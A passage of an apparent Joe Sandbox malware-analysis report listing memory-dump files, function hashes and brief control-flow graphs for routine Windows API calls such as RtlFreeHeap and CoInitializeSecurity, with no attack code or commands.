                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1c419b38d3fc6ff1e1da65df91c6085d088a078b8d0606a35e8659eb74bfee5a
                                                                                                                                                • Instruction ID: 6edc3c1e991f980d895104d1e11e3c719de94029ff5dd340b7b35996eb76a0ab
                                                                                                                                                • Opcode Fuzzy Hash: 1c419b38d3fc6ff1e1da65df91c6085d088a078b8d0606a35e8659eb74bfee5a
                                                                                                                                                • Instruction Fuzzy Hash: DE419B34208314ABDB14DF15E890B2FFBEAFB86754F64882DF58A97251D331E801DB62
                                                                                                                                                Function 005A00D0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                                                                                                                • Instruction ID: 5a9bd64f1fc30f16a7ff5f1a52e1d6b4d7a975891fa82c1909c6d2b3b9e43383
                                                                                                                                                • Opcode Fuzzy Hash: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                                                                                                                • Instruction Fuzzy Hash: 0721D73291C3504BC7195E289C902AEBFD2BBC6310F1A992EE9A64B3C1D9359D44D392
                                                                                                                                                Function 005A3220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 357 5a3220-5a322f 358 5a32ac-5a32b0 357->358 359 5a32a2-5a32a6 RtlFreeHeap 357->359 360 5a32a0 357->360 361 5a3236-5a3252 357->361 359->358 360->359 362 5a3286-5a3296 361->362 363 5a3254 361->363 362->360 364 5a3260-5a3284 call 5a5af0 363->364 364->362
                                                                                                                                                APIs
                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000), ref: 005A32A6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                • Opcode ID: a7a4bcce42b6b444eafb3412ff9bde4c33d8a102645538ad58e292a1c8162d73
                                                                                                                                                • Instruction ID: 7677ad6d6d55f01c55155e695191dda93beca9618bdfbad9a9a1e7716e0e5dda
                                                                                                                                                • Opcode Fuzzy Hash: a7a4bcce42b6b444eafb3412ff9bde4c33d8a102645538ad58e292a1c8162d73
                                                                                                                                                • Instruction Fuzzy Hash: 5D018B3450D2409BC740AB18E844A1EBBE8EF5A700F054D1CE4C48B321D335EC24DBA2
                                                                                                                                                Function 005A5BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 367 5a5bb0-5a5be2 LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                • LdrInitializeThunk.NTDLL(005A98C0,005C003F,00000002,00000018,?), ref: 005A5BDE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                Function 00572F6F Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 368 572f6f-572f87 CoInitializeSecurity
                                                                                                                                                APIs
                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00572F81
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
